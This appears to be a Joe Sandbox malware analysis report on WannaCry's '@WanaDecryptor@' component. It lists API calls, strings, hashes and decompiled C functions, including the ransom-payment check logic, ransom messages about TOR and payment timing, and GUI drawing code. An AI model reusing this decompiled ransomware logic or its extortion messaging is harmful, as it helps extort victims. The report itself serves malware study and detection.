                                                      • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
                                                      • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
                                                      • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
                                                      • #800.MFC42 ref: 00408440
                                                      • time.MSVCRT ref: 0040844E
                                                      • fopen.MSVCRT ref: 00408487
                                                      • #800.MFC42 ref: 004084A8
                                                      • fread.MSVCRT ref: 004084C2
                                                      • fclose.MSVCRT ref: 004084C9
                                                      • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
                                                      • time.MSVCRT ref: 00408528
                                                      • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
                                                      • #800.MFC42 ref: 0040855B
                                                      Strings
                                                      • s.wnry, xrefs: 004084DD
                                                      • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
                                                      • Too short message!, xrefs: 0040834F
                                                      • Your message has been sent successfully!, xrefs: 0040851D
                                                      • 00000000.res, xrefs: 00408480
                                                      • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
                                                      • String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
                                                      • API String ID: 1233543560-382338106
                                                      • Opcode ID: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
                                                      • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                                      • Opcode Fuzzy Hash: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
                                                      • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
                                                      				struct HBRUSH__* _v8;
                                                      				char _v16;
                                                      				char _v28;
                                                      				intOrPtr _v36;
                                                      				char _v52;
                                                      				char _v76;
                                                      				char _v88;
                                                      				intOrPtr _v120;
                                                      				intOrPtr _v124;
                                                      				struct HDC__* _v128;
                                                      				signed int _v132;
                                                      				void* _v136;
                                                      				char _v144;
                                                      				signed int _v148;
                                                      				struct HBRUSH__* _v152;
                                                      				intOrPtr _v156;
                                                      				struct HBRUSH__* _v160;
                                                      				char _v164;
                                                      				void* _v168;
                                                      				long _v172;
                                                      				char _v176;
                                                      				char _v180;
                                                      				struct tagRECT _v196;
                                                      				intOrPtr _v200;
                                                      				char* _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				char _v216;
                                                      				intOrPtr _v220;
                                                      				char _v224;
                                                      				char _v228;
                                                      				struct HBRUSH__* _v232;
                                                      				intOrPtr _v236;
                                                      				char _v240;
                                                      				intOrPtr _v244;
                                                      				intOrPtr _v248;
                                                      				struct HDC__* _v252;
                                                      				char _v256;
                                                      				struct HBRUSH__* _v260;
                                                      				struct HBRUSH__* _v264;
                                                      				char _v268;
                                                      				intOrPtr _v272;
                                                      				intOrPtr _v276;
                                                      				char _v280;
                                                      				struct HBRUSH__* _v284;
                                                      				struct HBRUSH__* _v288;
                                                      				char _v292;
                                                      				intOrPtr _v300;
                                                      				char _v324;
                                                      				signed int _t146;
                                                      				intOrPtr _t148;
                                                      				signed int _t150;
                                                      				void* _t152;
                                                      				intOrPtr _t155;
                                                      				char _t163;
                                                      				char* _t165;
                                                      				RECT* _t177;
                                                      				struct HBRUSH__* _t182;
                                                      				intOrPtr _t206;
                                                      				signed int _t276;
                                                      				intOrPtr _t277;
                                                      				intOrPtr* _t281;
                                                      				void* _t283;
                                                      				long _t284;
                                                      				intOrPtr _t286;
                                                      				intOrPtr _t291;
                                                      				signed long long _t299;
                                                      				signed long long _t301;
                                                      				signed long long _t303;
                                                      
                                                      				_t299 = __fp0;
                                                      				_t283 = __ebp;
                                                      				_push(0xffffffff);
                                                      				_push(E00414055);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t286;
                                                      				_t281 = __ecx;
                                                      				_push(__ecx);
                                                      				L00412DD0();
                                                      				_v8 = 0;
                                                      				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
                                                      				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
                                                      				_push( &_v164);
                                                      				_push( &_v168);
                                                      				L00412FFE();
                                                      				L00412E54();
                                                      				_v16 = 1;
                                                      				E00407640( &_v240);
                                                      				_v240 = 0x41675c;
                                                      				_t206 = _v120;
                                                      				_t146 = 0 | _t206 == 0x00000000;
                                                      				_v16 = 2;
                                                      				_v256 = 0x4166e0;
                                                      				_v228 =  &_v132;
                                                      				_v232 = 0;
                                                      				_v208 = _t146;
                                                      				if(_t146 == 0) {
                                                      					_v244 = _t206;
                                                      					_v248 = _v124;
                                                      					_v252 = _v128;
                                                      				} else {
                                                      					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
                                                      					asm("sbb eax, eax");
                                                      					_push(CreateCompatibleDC( ~( &_v136) & _v132));
                                                      					L00412E4E();
                                                      					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
                                                      					_t35 =  &_v264; // 0x41675c
                                                      					_v260 = E00409F10( &_v280, _t35);
                                                      					_push(_v248);
                                                      					_push(_v252);
                                                      					_push( &_v76);
                                                      					L00412FF8();
                                                      				}
                                                      				_v16 = 3;
                                                      				_v204 =  &_v256;
                                                      				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
                                                      				_t291 = _t148;
                                                      				if(_t291 == 0) {
                                                      					_push( *((intOrPtr*)(_t281 + 0x58)));
                                                      					_push( &_v196);
                                                      					L00412FF2();
                                                      				} else {
                                                      					if(_t291 != 0) {
                                                      						_t182 =  *(_t148 + 4);
                                                      					} else {
                                                      						_t182 = 0;
                                                      					}
                                                      					FillRect(_v252,  &_v196, _t182);
                                                      				}
                                                      				_push(_t281 + 0x74);
                                                      				L00412FEC();
                                                      				_t150 = _v196.top;
                                                      				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
                                                      					_v268 = 0x4166e0;
                                                      					_v28 = 5;
                                                      					if(_v220 == 0) {
                                                      						_v260 = 0;
                                                      						_v264 = 0;
                                                      					} else {
                                                      						_t153 = _v232;
                                                      						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
                                                      						_t155 = _v276;
                                                      						if(_t155 != 0) {
                                                      							_push( *((intOrPtr*)(_t155 + 4)));
                                                      							_push(_v264);
                                                      							L00412E48();
                                                      						} else {
                                                      							_push(0);
                                                      							_push(_v264);
                                                      							L00412E48();
                                                      						}
                                                      					}
                                                      					_v28 = 4;
                                                      				} else {
                                                      					L00412FE6();
                                                      					_v212 = _t150;
                                                      					_t276 = _t150 & 0x00008000;
                                                      					_v148 = _t150 & 0x00002000;
                                                      					_v180 = 0;
                                                      					_v176 = 0;
                                                      					_v168 = 0;
                                                      					_v164 = 0;
                                                      					_v160 = 0;
                                                      					_v152 = 0;
                                                      					if((_t150 & 0x00000004) == 0) {
                                                      						_v156 = _v200 - _v208;
                                                      					} else {
                                                      						_v156 = _v196.left - _v204;
                                                      					}
                                                      					asm("fild dword [esp+0x80]");
                                                      					_push(_t283);
                                                      					_t284 = _v196.right.left;
                                                      					_t163 = _v196.top - _t284;
                                                      					_v272 = _v196.bottom - _t284;
                                                      					asm("fild dword [esp+0x10]");
                                                      					_v272 = _t163;
                                                      					asm("fild dword [esp+0x10]");
                                                      					_t301 = _t299 * st2 / st1;
                                                      					L0041304A();
                                                      					_v172 = _t163;
                                                      					if(_t276 == 0) {
                                                      						st0 = _t301;
                                                      						st0 = _t301;
                                                      					} else {
                                                      						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
                                                      						asm("fild dword [esp+0x10]");
                                                      						_t303 = _t301 * st2 / st1;
                                                      						L0041304A();
                                                      						st0 = _t303;
                                                      						st0 = _t303;
                                                      						_v180 = _t163;
                                                      					}
                                                      					_t277 =  *((intOrPtr*)(_t281 + 0x54));
                                                      					if(_t277 == 0) {
                                                      						_t165 =  &_v180;
                                                      						if(_v148 == 0) {
                                                      							_t165 =  &_v164;
                                                      						}
                                                      						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
                                                      					} else {
                                                      						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
                                                      						if(_t277 != 0) {
                                                      							FillRect(_v264, _t177,  *(_t277 + 4));
                                                      						} else {
                                                      							FillRect(_v264, _t177, 0);
                                                      						}
                                                      					}
                                                      					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
                                                      					_v292 = 0x4166e0;
                                                      					_v52 = 7;
                                                      					if(_v244 == 0) {
                                                      						_v284 = 0;
                                                      						_v288 = 0;
                                                      						_v52 = 6;
                                                      					} else {
                                                      						_t172 = _v256;
                                                      						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
                                                      						_t112 =  &_v324; // 0x4166e0
                                                      						E00409F10(_t112, _v300);
                                                      						_v88 = 6;
                                                      					}
                                                      				}
                                                      				_t133 =  &_v252; // 0x41675c
                                                      				_t152 = E00409E20(_t133);
                                                      				_v28 = 0;
                                                      				L00412E3C();
                                                      				_v28 = 0xffffffff;
                                                      				L00412DB8();
                                                      				 *[fs:0x0] = _v36;
                                                      				return _t152;
                                                      			}
                                                      0x00408949
                                                      0x0040894f
                                                      0x00408951
                                                      0x00408958
                                                      0x0040895c
                                                      0x0040897e
                                                      0x00408980
                                                      0x0040895e
                                                      0x00408963
                                                      0x00408967
                                                      0x0040896d
                                                      0x0040896f
                                                      0x00408974
                                                      0x00408976
                                                      0x00408978
                                                      0x00408978
                                                      0x00408982
                                                      0x00408988
                                                      0x004089d3
                                                      0x004089d7
                                                      0x004089d9
                                                      0x004089d9
                                                      0x004089ec
                                                      0x0040898a
                                                      0x0040899e
                                                      0x004089a5
                                                      0x004089c2
                                                      0x004089a7
                                                      0x004089b0
                                                      0x004089b0
                                                      0x004089a5
                                                      0x00408a05
                                                      0x00408a0b
                                                      0x00408a17
                                                      0x00408a21
                                                      0x00408a6b
                                                      0x00408a6f
                                                      0x00408a73
                                                      0x00408a23
                                                      0x00408a23
                                                      0x00408a4b
                                                      0x00408a54
                                                      0x00408a59
                                                      0x00408a5e
                                                      0x00408a5e
                                                      0x00408a21
                                                      0x00408af5
                                                      0x00408af9
                                                      0x00408b02
                                                      0x00408b09
                                                      0x00408b15
                                                      0x00408b20
                                                      0x00408b2f
                                                      0x00408b3c

                                                      APIs
                                                      • #470.MFC42 ref: 00408708
                                                      • GetClientRect.USER32(?,?), ref: 0040871F
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                                      • #6734.MFC42(?,?), ref: 00408746
                                                      • #323.MFC42(?,?), ref: 0040874F
                                                      • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                                      • #1640.MFC42(00000000), ref: 004087DD
                                                        • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                                        • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                                      • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                                      • FillRect.USER32(?,?,?), ref: 0040887D
                                                      • #2754.MFC42(?,?), ref: 00408892
                                                      • #2381.MFC42(?,?,?), ref: 0040889F
                                                      • #3797.MFC42(?,?,?), ref: 004088C0
                                                      • _ftol.MSVCRT ref: 00408951
                                                      • _ftol.MSVCRT ref: 0040896F
                                                      • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                                      • #640.MFC42(?,?,?), ref: 00408B09
                                                      • #755.MFC42(?,?,?), ref: 00408B20
                                                        • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                                      • String ID: \gA$fA$fA
                                                      • API String ID: 1027735583-2217880857
                                                      • Opcode ID: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                                      • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                                      • Opcode Fuzzy Hash: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                                      • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                      • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                      • API String ID: 2817753184-2613825984
                                                      • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                                      • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E00401760(void* __ecx) {
                                                      				int _v8;
                                                      				intOrPtr _v12;
                                                      				char _v20;
                                                      				struct _IO_FILE* _v32;
                                                      				void _v2059;
                                                      				void _v2060;
                                                      				void _v2571;
                                                      				void _v2572;
                                                      				char _v2576;
                                                      				char _v2604;
                                                      				void* _v2608;
                                                      				char _v2616;
                                                      				void* _v2636;
                                                      				void* _v2640;
                                                      				void* _t36;
                                                      				struct _IO_FILE* _t37;
                                                      				signed int _t38;
                                                      				unsigned int _t45;
                                                      				signed int _t49;
                                                      				void* _t50;
                                                      				signed int _t67;
                                                      				struct _IO_FILE* _t87;
                                                      				void* _t94;
                                                      				void* _t97;
                                                      				intOrPtr _t98;
                                                      				void* _t99;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004134C6);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t98;
                                                      				_t99 = _t98 - 0xa28;
                                                      				_t94 = __ecx;
                                                      				L00412CD4();
                                                      				_t36 =  *(__ecx + 0xac);
                                                      				if(_t36 != 0) {
                                                      					WaitForSingleObject(_t36, 0xbb8);
                                                      					TerminateThread( *(_t94 + 0xac), 0);
                                                      					CloseHandle( *(_t94 + 0xac));
                                                      				}
                                                      				_t37 = E0040C670();
                                                      				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
                                                      					L15:
                                                      					 *[fs:0x0] = _v12;
                                                      					return _t37;
                                                      				} else {
                                                      					_t37 =  *(_t94 + 0xa8);
                                                      					if(_t37 != 1) {
                                                      						if(_t37 != 0xffffffff) {
                                                      							if(_t37 != 2) {
                                                      								goto L15;
                                                      							}
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
                                                      							L14:
                                                      							L00412CC8();
                                                      							goto L15;
                                                      						}
                                                      						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
                                                      							L11:
                                                      							_push(0);
                                                      							_push(0xf0);
                                                      							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                                      							goto L14;
                                                      						}
                                                      						_t38 = rand();
                                                      						asm("cdq");
                                                      						_t37 = _t38 / 3;
                                                      						if(_t38 % 3 != 0) {
                                                      							goto L11;
                                                      						}
                                                      						_push(0);
                                                      						_push(0x30);
                                                      						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                                      						goto L14;
                                                      					}
                                                      					_v2572 = 0;
                                                      					memset( &_v2571, 0, 0x7f << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					_v2060 = 0;
                                                      					memset( &_v2059, 0, 0x1ff << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					sprintf( &_v2604, "%08X.dky", 0);
                                                      					_t37 = fopen( &_v2604, "rb");
                                                      					_t87 = _t37;
                                                      					_t99 = _t99 + 0x2c;
                                                      					if(_t87 == 0) {
                                                      						_push(0);
                                                      						_push(0xf0);
                                                      						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                                      						L00412CC8();
                                                      						 *(_t94 + 0xa8) = 0xffffffff;
                                                      					} else {
                                                      						_t45 = fread( &_v2060, 1, 0x800, _t87);
                                                      						fclose(_t87);
                                                      						DeleteFileA( &_v2604);
                                                      						_t97 =  &_v2060;
                                                      						_t67 = _t45 >> 2;
                                                      						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
                                                      						_push("You have a new message:\n");
                                                      						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
                                                      						_t99 = _t99 + 0x2c;
                                                      						L00412CAA();
                                                      						_push( &_v2576);
                                                      						_push(_t50);
                                                      						_push( &_v2616);
                                                      						_v8 = 0;
                                                      						L00412CCE();
                                                      						_t37 =  *_t50;
                                                      						_push(0);
                                                      						_push(0x40);
                                                      						_push(_t37);
                                                      						_v20 = 1;
                                                      						L00412CC8();
                                                      						_v32 = 0;
                                                      						L00412CC2();
                                                      						_v32 = 0xffffffff;
                                                      						L00412CC2();
                                                      					}
                                                      					goto L15;
                                                      				}
                                                      			}






























                                                      APIs
                                                      • #6453.MFC42 ref: 00401780
                                                      • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                                      • CloseHandle.KERNEL32(?), ref: 004017B2
                                                      • sprintf.MSVCRT ref: 00401811
                                                      • fopen.MSVCRT ref: 00401821
                                                      • fread.MSVCRT ref: 00401844
                                                      • fclose.MSVCRT ref: 0040184D
                                                      • DeleteFileA.KERNEL32(?), ref: 0040185B
                                                      • #537.MFC42(You have a new message:), ref: 00401885
                                                      • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                                      • #1200.MFC42 ref: 004018AF
                                                      • #800.MFC42 ref: 004018BF
                                                      • #800.MFC42 ref: 004018D3
                                                      • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                                      Strings
                                                      • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                                      • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                                      • You have a new message:, xrefs: 00401877
                                                      • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                                      • %08X.dky, xrefs: 0040180A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                                      • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                                      • API String ID: 2207195628-1375496427
                                                      • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                                      • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00405E10(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				void* _t86;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr* _t122;
                                                      				intOrPtr* _t123;
                                                      				intOrPtr* _t124;
                                                      				intOrPtr* _t125;
                                                      				intOrPtr* _t126;
                                                      				intOrPtr* _t127;
                                                      				intOrPtr _t132;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413C65);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t132;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t121 = __ecx + 0x890;
                                                      				_v16 = _t121;
                                                      				 *_t121 = 0x415c00;
                                                      				_v4 = 0x1d;
                                                      				L00412D52();
                                                      				 *_t121 = 0x415bec;
                                                      				_t122 = __ecx + 0x888;
                                                      				_v16 = _t122;
                                                      				 *_t122 = 0x415c00;
                                                      				_v4 = 0x1e;
                                                      				L00412D52();
                                                      				 *_t122 = 0x415bec;
                                                      				_t123 = __ecx + 0x880;
                                                      				_v16 = _t123;
                                                      				 *_t123 = 0x415c00;
                                                      				_v4 = 0x1f;
                                                      				L00412D52();
                                                      				 *_t123 = 0x415bec;
                                                      				_t124 = __ecx + 0x878;
                                                      				_v16 = _t124;
                                                      				 *_t124 = 0x415c00;
                                                      				_v4 = 0x20;
                                                      				L00412D52();
                                                      				 *_t124 = 0x415bec;
                                                      				_v4 = 0x18;
                                                      				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x870);
                                                      				_v4 = 0x17;
                                                      				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x868);
                                                      				_v4 = 0x16;
                                                      				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x860);
                                                      				_v4 = 0x15;
                                                      				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x858);
                                                      				_t125 = __ecx + 0x850;
                                                      				_v16 = _t125;
                                                      				 *_t125 = 0x415c00;
                                                      				_v4 = 0x21;
                                                      				L00412D52();
                                                      				 *_t125 = 0x415bec;
                                                      				_v4 = 0x13;
                                                      				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x848);
                                                      				_v4 = 0x12;
                                                      				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x840);
                                                      				_v4 = 0x11;
                                                      				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x838);
                                                      				_t126 = __ecx + 0x830;
                                                      				_v16 = _t126;
                                                      				 *_t126 = 0x415c00;
                                                      				_v4 = 0x22;
                                                      				L00412D52();
                                                      				 *_t126 = 0x415bec;
                                                      				_v4 = 0xf;
                                                      				L00412CC2();
                                                      				_v4 = 0xe;
                                                      				L00412CC2();
                                                      				_v4 = 0xd;
                                                      				L00412CC2();
                                                      				_v4 = 0xc;
                                                      				L00412CC2();
                                                      				_v4 = 0xb;
                                                      				L00412EF6();
                                                      				_v4 = 0xa;
                                                      				E004050A0(__ecx + 0x444);
                                                      				_v4 = 9;
                                                      				E004050A0(__ecx + 0x3c8);
                                                      				_v4 = 8;
                                                      				E00404170(__ecx + 0x360);
                                                      				_v4 = 7;
                                                      				E00404170(__ecx + 0x2f8);
                                                      				_v4 = 6;
                                                      				E00404170(__ecx + 0x290);
                                                      				_v4 = 5;
                                                      				E00404170(__ecx + 0x228);
                                                      				_t127 = __ecx + 0x1a4;
                                                      				_v16 = _t127;
                                                      				 *_t127 = 0x4161a4;
                                                      				_v4 = 0x23;
                                                      				L00412F0E();
                                                      				_v4 = 4;
                                                      				L00412C9E();
                                                      				_v4 = 3;
                                                      				_t86 = E00405D90(__ecx + 0x120);
                                                      				_v4 = 2;
                                                      				L00412EF0();
                                                      				_v4 = 1;
                                                      				L00412EF0();
                                                      				_v4 = 0;
                                                      				L00412D4C();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t86;
                                                      			}

















                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
